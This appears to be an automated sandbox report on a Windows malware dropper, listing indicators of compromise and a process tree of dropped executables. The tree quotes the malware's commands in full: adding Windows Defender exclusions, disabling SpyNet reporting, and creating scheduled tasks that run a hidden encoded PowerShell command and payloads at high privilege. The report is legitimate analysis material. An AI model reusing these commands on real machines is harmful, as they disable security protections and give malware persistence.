5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\47BEABC922EAE80E78783462A79F45C254FDE68B setup_2.tmp -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exesetup_2.tmppid process 4164 powershell.exe 4164 powershell.exe 3748 setup_2.tmp 3748 setup_2.tmp 3748 setup_2.tmp 3748 setup_2.tmp 3748 setup_2.tmp 3748 setup_2.tmp 3748 setup_2.tmp 3748 setup_2.tmp 3748 setup_2.tmp 3748 setup_2.tmp 3748 setup_2.tmp 3748 setup_2.tmp 3748 setup_2.tmp 3748 setup_2.tmp 3748 setup_2.tmp 3748 setup_2.tmp 3748 setup_2.tmp 3748 setup_2.tmp 3748 setup_2.tmp 3748 setup_2.tmp 3748 setup_2.tmp 3748 setup_2.tmp 3748 setup_2.tmp 3748 setup_2.tmp 3748 setup_2.tmp 3748 setup_2.tmp 3748 setup_2.tmp 3748 setup_2.tmp 3748 setup_2.tmp 3748 setup_2.tmp 3748 setup_2.tmp 3748 setup_2.tmp 3748 setup_2.tmp 3748 setup_2.tmp 3748 setup_2.tmp 3748 setup_2.tmp 3748 setup_2.tmp 3748 setup_2.tmp 3748 setup_2.tmp 3748 setup_2.tmp 3748 setup_2.tmp 3748 setup_2.tmp 3748 setup_2.tmp 3748 setup_2.tmp 3748 setup_2.tmp 3748 setup_2.tmp 3748 setup_2.tmp 3748 setup_2.tmp 3748 setup_2.tmp 3748 setup_2.tmp 3748 setup_2.tmp 3748 setup_2.tmp 3748 setup_2.tmp 3748 setup_2.tmp 3748 setup_2.tmp 3748 setup_2.tmp 3748 setup_2.tmp 3748 setup_2.tmp 3748 setup_2.tmp 3748 setup_2.tmp 3748 setup_2.tmp 3748 setup_2.tmp -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 3232 -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
fOdOVTJ4cAdpEqSN_u_aeghQ.exe7A66.exepid process 6944 fOdOVTJ4cAdpEqSN_u_aeghQ.exe 6380 7A66.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Sat20873bc74eb80e0.exeSat205eb4a2ece877a.exeSat20ed203af5.exepowershell.exeSat2071d99516dc03841.exeWerFault.exe1389700.scrWerFault.exe2.exePublicDwlBrowser1100.execy3BD8IMClWAp4Sb5SGnjwsu.exedescription pid process Token: SeCreateTokenPrivilege 4792 Sat20873bc74eb80e0.exe Token: SeAssignPrimaryTokenPrivilege 4792 Sat20873bc74eb80e0.exe Token: SeLockMemoryPrivilege 4792 Sat20873bc74eb80e0.exe Token: SeIncreaseQuotaPrivilege 4792 Sat20873bc74eb80e0.exe Token: SeMachineAccountPrivilege 4792 Sat20873bc74eb80e0.exe Token: SeTcbPrivilege 4792 Sat20873bc74eb80e0.exe Token: SeSecurityPrivilege 4792 Sat20873bc74eb80e0.exe Token: SeTakeOwnershipPrivilege 4792 Sat20873bc74eb80e0.exe Token: SeLoadDriverPrivilege 4792 Sat20873bc74eb80e0.exe Token: SeSystemProfilePrivilege 4792 Sat20873bc74eb80e0.exe Token: SeSystemtimePrivilege 4792 Sat20873bc74eb80e0.exe Token: SeProfSingleProcessPrivilege 4792 Sat20873bc74eb80e0.exe Token: SeIncBasePriorityPrivilege 4792 Sat20873bc74eb80e0.exe Token: SeCreatePagefilePrivilege 4792 Sat20873bc74eb80e0.exe Token: SeCreatePermanentPrivilege 4792 Sat20873bc74eb80e0.exe Token: SeBackupPrivilege 4792 Sat20873bc74eb80e0.exe Token: SeRestorePrivilege 4792 Sat20873bc74eb80e0.exe Token: SeShutdownPrivilege 4792 Sat20873bc74eb80e0.exe Token: SeDebugPrivilege 4792 Sat20873bc74eb80e0.exe Token: SeAuditPrivilege 4792 Sat20873bc74eb80e0.exe Token: SeSystemEnvironmentPrivilege 4792 Sat20873bc74eb80e0.exe Token: SeChangeNotifyPrivilege 4792 Sat20873bc74eb80e0.exe Token: SeRemoteShutdownPrivilege 4792 Sat20873bc74eb80e0.exe Token: SeUndockPrivilege 4792 Sat20873bc74eb80e0.exe Token: SeSyncAgentPrivilege 4792 Sat20873bc74eb80e0.exe Token: SeEnableDelegationPrivilege 4792 Sat20873bc74eb80e0.exe Token: SeManageVolumePrivilege 4792 Sat20873bc74eb80e0.exe Token: SeImpersonatePrivilege 4792 Sat20873bc74eb80e0.exe Token: SeCreateGlobalPrivilege 4792 Sat20873bc74eb80e0.exe Token: 31 4792 Sat20873bc74eb80e0.exe Token: 32 4792 Sat20873bc74eb80e0.exe Token: 33 4792 Sat20873bc74eb80e0.exe Token: 34 4792 Sat20873bc74eb80e0.exe Token: 35 4792 Sat20873bc74eb80e0.exe Token: SeDebugPrivilege 1068 Sat205eb4a2ece877a.exe Token: SeDebugPrivilege 3968 Sat20ed203af5.exe Token: SeDebugPrivilege 4164 powershell.exe Token: SeDebugPrivilege 4856 Sat2071d99516dc03841.exe Token: SeRestorePrivilege 5788 WerFault.exe Token: SeBackupPrivilege 5788 WerFault.exe Token: SeDebugPrivilege 5900 1389700.scr Token: SeDebugPrivilege 860 WerFault.exe Token: SeDebugPrivilege 4748 2.exe Token: SeDebugPrivilege 5516 PublicDwlBrowser1100.exe Token: SeCreateTokenPrivilege 2416 cy3BD8IMClWAp4Sb5SGnjwsu.exe Token: SeAssignPrimaryTokenPrivilege 2416 cy3BD8IMClWAp4Sb5SGnjwsu.exe Token: SeLockMemoryPrivilege 2416 cy3BD8IMClWAp4Sb5SGnjwsu.exe Token: SeIncreaseQuotaPrivilege 2416 cy3BD8IMClWAp4Sb5SGnjwsu.exe Token: SeMachineAccountPrivilege 2416 cy3BD8IMClWAp4Sb5SGnjwsu.exe Token: SeTcbPrivilege 2416 cy3BD8IMClWAp4Sb5SGnjwsu.exe Token: SeSecurityPrivilege 2416 cy3BD8IMClWAp4Sb5SGnjwsu.exe Token: SeTakeOwnershipPrivilege 2416 cy3BD8IMClWAp4Sb5SGnjwsu.exe Token: SeLoadDriverPrivilege 2416 cy3BD8IMClWAp4Sb5SGnjwsu.exe Token: SeSystemProfilePrivilege 2416 cy3BD8IMClWAp4Sb5SGnjwsu.exe Token: SeSystemtimePrivilege 2416 cy3BD8IMClWAp4Sb5SGnjwsu.exe Token: SeProfSingleProcessPrivilege 2416 cy3BD8IMClWAp4Sb5SGnjwsu.exe Token: SeIncBasePriorityPrivilege 2416 cy3BD8IMClWAp4Sb5SGnjwsu.exe Token: SeCreatePagefilePrivilege 2416 cy3BD8IMClWAp4Sb5SGnjwsu.exe Token: SeCreatePermanentPrivilege 2416 cy3BD8IMClWAp4Sb5SGnjwsu.exe Token: SeBackupPrivilege 2416 cy3BD8IMClWAp4Sb5SGnjwsu.exe Token: SeRestorePrivilege 2416 cy3BD8IMClWAp4Sb5SGnjwsu.exe Token: SeShutdownPrivilege 2416 cy3BD8IMClWAp4Sb5SGnjwsu.exe Token: SeDebugPrivilege 2416 cy3BD8IMClWAp4Sb5SGnjwsu.exe Token: SeAuditPrivilege 2416 cy3BD8IMClWAp4Sb5SGnjwsu.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
Processes:
setup_2.tmpultramediaburner.tmpinstaller.exemsedge.exepid process 3748 setup_2.tmp 6496 ultramediaburner.tmp 8784 installer.exe 11260 msedge.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
cmd.exepid process 8916 cmd.exe -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
pid process 3232 -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
setup_x86_x64_install.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 3552 wrote to memory of 4996 3552 setup_x86_x64_install.exe setup_installer.exe PID 3552 wrote to memory of 4996 3552 setup_x86_x64_install.exe setup_installer.exe PID 3552 wrote to memory of 4996 3552 setup_x86_x64_install.exe setup_installer.exe PID 4996 wrote to memory of 4780 4996 setup_installer.exe setup_install.exe PID 4996 wrote to memory of 4780 4996 setup_installer.exe setup_install.exe PID 4996 wrote to memory of 4780 4996 setup_installer.exe setup_install.exe PID 4780 wrote to memory of 3524 4780 setup_install.exe cmd.exe PID 4780 wrote to memory of 3524 4780 setup_install.exe cmd.exe PID 4780 wrote to memory of 3524 4780 setup_install.exe cmd.exe PID 4780 wrote to memory of 3528 4780 setup_install.exe cmd.exe PID 4780 wrote to memory of 3528 4780 setup_install.exe cmd.exe PID 4780 wrote to memory of 3528 4780 setup_install.exe cmd.exe PID 4780 wrote to memory of 4288 4780 setup_install.exe cmd.exe PID 4780 wrote to memory of 4288 4780 setup_install.exe cmd.exe PID 4780 wrote to memory of 4288 4780 setup_install.exe cmd.exe PID 4780 wrote to memory of 3848 4780 setup_install.exe cmd.exe PID 4780 wrote to memory of 3848 4780 setup_install.exe cmd.exe PID 4780 wrote to memory of 3848 4780 setup_install.exe cmd.exe PID 4780 wrote to memory of 3956 4780 setup_install.exe cmd.exe PID 4780 wrote to memory of 3956 4780 setup_install.exe cmd.exe PID 4780 wrote to memory of 3956 4780 setup_install.exe cmd.exe PID 4780 wrote to memory of 3600 4780 setup_install.exe cmd.exe PID 4780 wrote to memory of 3600 4780 setup_install.exe cmd.exe PID 4780 wrote to memory of 3600 4780 setup_install.exe cmd.exe PID 4780 wrote to memory of 4932 4780 setup_install.exe cmd.exe PID 4780 wrote to memory of 4932 4780 setup_install.exe cmd.exe PID 4780 wrote to memory of 4932 4780 setup_install.exe cmd.exe PID 4780 wrote to memory of 5032 4780 setup_install.exe cmd.exe PID 4780 wrote to memory of 5032 4780 setup_install.exe cmd.exe PID 4780 wrote to memory of 5032 4780 setup_install.exe cmd.exe PID 4780 wrote to memory of 4696 4780 setup_install.exe cmd.exe PID 4780 wrote to memory of 4696 4780 setup_install.exe cmd.exe PID 4780 wrote to memory of 4696 4780 setup_install.exe cmd.exe PID 3600 wrote to memory of 4792 3600 cmd.exe Sat20873bc74eb80e0.exe PID 3600 wrote to memory of 4792 3600 cmd.exe Sat20873bc74eb80e0.exe PID 3600 wrote to memory of 4792 3600 cmd.exe Sat20873bc74eb80e0.exe PID 4780 wrote to memory of 884 4780 setup_install.exe cmd.exe PID 4780 wrote to memory of 884 4780 setup_install.exe cmd.exe PID 4780 wrote to memory of 884 4780 setup_install.exe cmd.exe PID 4780 wrote to memory of 1472 4780 setup_install.exe cmd.exe PID 4780 wrote to memory of 1472 4780 setup_install.exe cmd.exe PID 4780 wrote to memory of 1472 4780 setup_install.exe cmd.exe PID 4780 wrote to memory of 1152 4780 setup_install.exe cmd.exe PID 4780 wrote to memory of 1152 4780 setup_install.exe cmd.exe PID 4780 wrote to memory of 1152 4780 setup_install.exe cmd.exe PID 4780 wrote to memory of 4160 4780 setup_install.exe cmd.exe PID 4780 wrote to memory of 4160 4780 setup_install.exe cmd.exe PID 4780 wrote to memory of 4160 4780 setup_install.exe cmd.exe PID 3528 wrote to memory of 3748 3528 cmd.exe Sat20ecdfe3ee79f.exe PID 3528 wrote to memory of 3748 3528 cmd.exe Sat20ecdfe3ee79f.exe PID 3528 wrote to memory of 3748 3528 cmd.exe Sat20ecdfe3ee79f.exe PID 3524 wrote to memory of 4164 3524 cmd.exe powershell.exe PID 3524 wrote to memory of 4164 3524 cmd.exe powershell.exe PID 3524 wrote to memory of 4164 3524 cmd.exe powershell.exe PID 4780 wrote to memory of 4632 4780 setup_install.exe cmd.exe PID 4780 wrote to memory of 4632 4780 setup_install.exe cmd.exe PID 4780 wrote to memory of 4632 4780 setup_install.exe cmd.exe PID 4288 wrote to memory of 4548 4288 cmd.exe Sat20578e6239.exe PID 4288 wrote to memory of 4548 4288 cmd.exe Sat20578e6239.exe PID 4288 wrote to memory of 4548 4288 cmd.exe Sat20578e6239.exe PID 3848 wrote to memory of 4856 3848 cmd.exe Sat2071d99516dc03841.exe PID 3848 wrote to memory of 4856 3848 cmd.exe Sat2071d99516dc03841.exe PID 5032 wrote to memory of 4824 5032 cmd.exe Sat20627fa1c49.exe PID 5032 wrote to memory of 4824 5032 cmd.exe Sat20627fa1c49.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat20ecdfe3ee79f.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\Sat20ecdfe3ee79f.exeSat20ecdfe3ee79f.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\vGjPBrntpoqDW5Fw9L47gEoc.exe"C:\Users\Admin\Documents\vGjPBrntpoqDW5Fw9L47gEoc.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\Qe7_6jGBbmEusoI6Z1m7NN9p.exe"C:\Users\Admin\Documents\Qe7_6jGBbmEusoI6Z1m7NN9p.exe"6⤵
- Executes dropped EXE
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
-
C:\Users\Admin\Documents\bM1lAK9_6qrDWhAvQCLFWrBk.exe"C:\Users\Admin\Documents\bM1lAK9_6qrDWhAvQCLFWrBk.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 2407⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\magaTnk_A4jqEFJV8eORLHQK.exe"C:\Users\Admin\Documents\magaTnk_A4jqEFJV8eORLHQK.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6092 -s 2407⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\s6pnBFURtpRt_98USqtnaTCv.exe"C:\Users\Admin\Documents\s6pnBFURtpRt_98USqtnaTCv.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\LKTftM5cJoptCgINSoW0ED8Q.exe"C:\Users\Admin\Documents\LKTftM5cJoptCgINSoW0ED8Q.exe"6⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"7⤵
-
C:\Users\Admin\Documents\lKyOf4nGgv7xYctM1LvW5lx5.exe"C:\Users\Admin\Documents\lKyOf4nGgv7xYctM1LvW5lx5.exe"8⤵
-
C:\Users\Admin\Documents\6TS6ei5M6qr67jBGWuixy3zm.exe"C:\Users\Admin\Documents\6TS6ei5M6qr67jBGWuixy3zm.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS27A2.tmp\Install.exe.\Install.exe9⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS2BB9.tmp\Install.exe.\Install.exe /S /site_id "668658"10⤵
- Checks BIOS information in registry
- Enumerates connected drives
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &11⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True15⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True15⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True15⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True15⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"11⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&12⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3213⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6413⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"11⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&12⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3213⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6413⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gzRAcrBGo" /SC once /ST 09:36:41 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="11⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bRciptYQhTCMvEFWGJ" /SC once /ST 14:29:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk\iXkrQovqyvDrylo\HcqbKbT.exe\" W8 /site_id 668658 /S" /V1 /F11⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\rqTLrt6ooAYbGkY2aAhbYxPP.exe"C:\Users\Admin\Documents\rqTLrt6ooAYbGkY2aAhbYxPP.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5324 -s 2409⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\NWXu0OucddIThdb5Qplybmke.exe"C:\Users\Admin\Documents\NWXu0OucddIThdb5Qplybmke.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\NWXu0OucddIThdb5Qplybmke.exeC:\Users\Admin\Documents\NWXu0OucddIThdb5Qplybmke.exe7⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\JbYLmYkiL5oh_BFQXzN1N2aA.exe"C:\Users\Admin\Documents\JbYLmYkiL5oh_BFQXzN1N2aA.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\82ccQYnRwSkZfpeuxGHOYtVJ.exe"C:\Users\Admin\Documents\82ccQYnRwSkZfpeuxGHOYtVJ.exe"6⤵
- Executes dropped EXE
-
